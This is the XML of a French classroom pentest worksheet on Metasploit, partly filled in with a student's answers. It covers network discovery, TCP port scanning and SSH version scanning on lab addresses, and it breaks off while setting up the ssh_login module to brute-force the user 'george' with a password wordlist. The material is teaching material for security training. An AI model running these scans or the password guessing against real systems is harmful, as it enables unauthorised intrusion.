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2" w:after="0"/>
        <w:ind w:left="0" w:hanging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Normal"/>
        <w:spacing w:before="92" w:after="0"/>
        <w:ind w:left="392" w:right="105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TD Pentest 3 - Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="92" w:after="240"/>
        <w:ind w:left="391" w:right="108" w:hanging="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Les manipulations de ce TD concernent la phase d’EXPLOITATION DE VULNERABILITES. Vous allez découvrir l’utilisation du framework Metasploit. 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82" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="A)_Metasploit"/>
      <w:bookmarkStart w:id="1" w:name="_bookmark0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r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360680</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>278765</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6840855" cy="1270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4pt,21.95pt" to="566.95pt,21.95pt" ID="Image1" stroked="t" style="position:absolute;flip:x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Découverte de Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:lineRule="auto" w:line="218" w:before="80" w:after="0"/>
        <w:ind w:left="392" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Le logiciel </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Monaco" w:hAnsi="Monaco"/>
          <w:color w:val="C30061"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>est une boîte à outils (framework) qui permet de faire une multitude de choses …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spacing w:before="120" w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Lancez Metasploit AVEC LES DROITS D’ADMIN avec la commande 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spacing w:before="120" w:after="0"/>
        <w:ind w:left="1967" w:hanging="0"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>msfconsole (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ou</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo msfconsole)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spacing w:before="120" w:after="0"/>
        <w:ind w:left="1967" w:hanging="0"/>
        <w:rPr>
          <w:color w:val="81D41A"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:color w:val="81D41A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sudo msfconsole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rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Affichez la page du manuel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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1967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</w:rPr>
        <w:t>help</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="86" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Peut-on avoir une aide plus précise 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rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Affichez les attaques disponibles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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1967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</w:rPr>
        <w:t>show payloads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="86" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Quelles autres informations permettent d’afficher la commande </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">show </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="86" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Testez tout ça, ça va vous servir !!!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82" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="224" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="B)_Scan_réseau"/>
      <w:bookmarkStart w:id="3" w:name="_bookmark1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r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360680</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>421005</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6840855" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0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4pt,33.15pt" to="566.95pt,33.15pt" ID="Image2" stroked="t" style="position:absolute;flip:x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Scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>réseau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spacing w:before="141" w:after="115"/>
        <w:ind w:left="482" w:hanging="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>La commande search permet de rechercher dans les multiples ressources de Metasploit selon des mots clés.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spacing w:before="141" w:after="115"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cherchez des </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">payloads </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>qui permettent de scanner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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spacing w:before="141" w:after="115"/>
        <w:ind w:left="1967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</w:rPr>
        <w:t>search scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="74" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Combien de payloads avez-vous trouvés ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="74" w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>682</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="114" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Pouvez-vous identifier les scanners permettant la découverte du réseau ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="114" w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
        </w:rPr>
        <w:t>scanner/http, scanner/utp, scanner/discovery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spacing w:before="82" w:after="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Affichez les scanner réseau</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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spacing w:before="82" w:after="0"/>
        <w:ind w:left="1967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</w:rPr>
        <w:t>search scanner/dsiscovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="84" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Quels sont les scanner trouvés ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="84" w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
        </w:rPr>
        <w:t>682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rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Utilisez le scanner </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>arp_sweep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1967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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use auxiliary/scanner/discovery/arp_sweep</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="84" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Que devient le prompt ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="84" w:after="0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msf6 auxiliary(scanner/discovery/arp_sweep) &gt;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rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Affichez maintenant les options du </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>payload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1967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</w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="84" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="84" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Quels sont les paramètres obligatoires ?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>Module options (auxiliary/scanner/discovery/arp_sweep):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Name       Current Setting  Required  Description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----       ---------------  --------  -----------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INTERFACE                   no        The name of the interface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RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html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SHOST                       no        Source IP Address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SMAC                        no        Source MAC Address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THREADS    1                yes       The number of concurrent threads (max one per host)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TIMEOUT    5                yes       The number of seconds to wait for new data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>View the full module info with the info, or info -d command.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rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Configurez le paramètre </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>RHOST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1967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</w:rPr>
        <w:t>set RHOST &lt;@ IP&gt;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1967" w:hanging="0"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>set RHOST 192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="fr-FR"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="84" w:after="0"/>
        <w:ind w:left="846" w:hanging="0"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Vérifiez la prise en compte avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>show options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Module options (auxiliary/scanner/discovery/arp_sweep):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Name       Current Setting  Required  Description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----       ---------------  --------  -----------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INTERFACE                   no        The name of the interface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RHOSTS     192.168.40.1     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html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SHOST                       no        Source IP Address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SMAC                        no        Source MAC Address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THREADS    1                yes       The number of concurrent threads (max one per host)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TIMEOUT    5                yes       The number of seconds to wait for new data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="84" w:after="0"/>
        <w:ind w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="84" w:after="0"/>
        <w:ind w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>View the full module info with the info, or info -d command.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rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Exécutez le payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4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1967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</w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="84" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Qu’avez-vous découvert ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="114" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>En cas d’erreur, relancer la console Metasploit avec :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="114" w:after="0"/>
        <w:ind w:left="846" w:firstLine="594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</w:rPr>
        <w:t>sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:lineRule="auto" w:line="336" w:before="120" w:after="0"/>
        <w:ind w:left="845" w:right="782" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Est-ce le bon payload ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:lineRule="auto" w:line="336" w:before="120" w:after="0"/>
        <w:ind w:left="846"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non</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:lineRule="auto" w:line="336"/>
        <w:ind w:left="845" w:right="782" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Quel payload faut-il utiliser pour scanner les port tcp ? Faites-le !</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:lineRule="auto" w:line="336"/>
        <w:ind w:left="846"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auxiliary/scanner/portscan/tcp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:lineRule="auto" w:line="336"/>
        <w:ind w:left="845" w:right="782" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:lineRule="auto" w:line="336"/>
        <w:ind w:left="845" w:right="782" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Quelles options avez-vous configurées ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:lineRule="auto" w:line="336"/>
        <w:ind w:left="845"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RHOST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>Module options (auxiliary/scanner/portscan/tcp):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Name         Current Setting  Required  Description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----         ---------------  --------  -----------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CONCURRENCY  10               yes       The number of concurrent ports to check per host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DELAY        0                yes       The delay between connections, per thread, in milliseconds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JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.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PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)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RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html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THREADS      1                yes       The number of concurrent threads (max one per host)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TIMEOUT      1000             yes       The socket connect timeout in milliseconds</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:lineRule="auto" w:line="336"/>
        <w:ind w:left="845" w:right="782" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Quels sont les ports ouverts découverts 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rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Vous </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">pouvez quitter le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>avec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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1967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</w:rPr>
        <w:t>Back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82" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0"/>
        <w:ind w:left="482" w:hanging="374"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="D)_SSH"/>
      <w:bookmarkStart w:id="5" w:name="_bookmark3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr/>
        <w:t>SSH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spacing w:before="143" w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Cherchez les payloads concernant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SSH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5" w:leader="none"/>
          <w:tab w:val="left" w:pos="846" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="143" w:after="0"/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search ssh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="114" w:after="0"/>
        <w:ind w:left="846" w:hanging="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Quel est le numéro du scanner de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">version SSH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="114" w:after="0"/>
        <w:ind w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
        </w:rPr>
        <w:t>54  auxiliary/scanner/ssh/ssh_version                                                  normal     No     SSH Version Scanner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spacing w:lineRule="auto" w:line="336"/>
        <w:ind w:left="846" w:right="3998" w:hanging="454"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Utilisez le scanner de version SSH trouvé</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-22"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>précédemment.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Quelles sont les options possibles ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr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use auxiliary/scanner/ssh/ssh_version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr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show options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph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Name     Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph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----     ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph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RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph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RPORT    22               yes       The target port (TCP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph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THREADS  1                yes       The number of concurrent threads (max one per host)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph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TIMEOUT  30               yes       Timeout for the SSH probe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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set RHOSTS 192.168.2.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="1" w:after="0"/>
        <w:ind w:left="846" w:hanging="0"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Donnez la version SSH de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>la cible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rPr>
          <w:b/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Cherchez le payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ssh_login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5" w:leader="none"/>
          <w:tab w:val="left" w:pos="846" w:leader="none"/>
        </w:tabs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search ssh_login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5" w:leader="none"/>
          <w:tab w:val="left" w:pos="846" w:leader="none"/>
        </w:tabs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use auxiliary/scanner/ssh/ssh_login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="114" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Que fait ce payload, quelles sont ses options ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="114" w:after="0"/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show options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="114" w:after="0"/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>Module options (auxiliary/scanner/ssh/ssh_login):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Name              Current Setting  Required  Description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----              ---------------  --------  -----------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BLANK_PASSWORDS   false            no        Try blank passwords for all users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BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5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DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database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DB_ALL_PASS       false            no        Add all passwords in the current database to the list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DB_ALL_USERS      false            no        Add all users in the current database to the list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DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&amp;realm)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PASSWORD                           no        A specific password to authenticate with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PASS_FILE                          no        File containing passwords, one per line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RHOSTS                             yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html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RPORT             22               yes       The target port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STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host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THREADS           1                yes       The number of concurrent threads (max one per host)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USERNAME                           no        A specific username to authenticate as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USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line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USER_AS_PASS      false            no        Try the username as the password for all users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USER_FILE                          no        File containing usernames, one per line</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody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VERBOSE           false            yes       Whether to print output for all attempts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spacing w:lineRule="auto" w:line="336"/>
        <w:ind w:left="846" w:right="784" w:hanging="454"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Utilisez le dictionnaire </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/password.lst </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">et l’utilisateur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>george</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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set RHOSTS 192.168.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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set USERNAME george</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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set PASS_FILE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
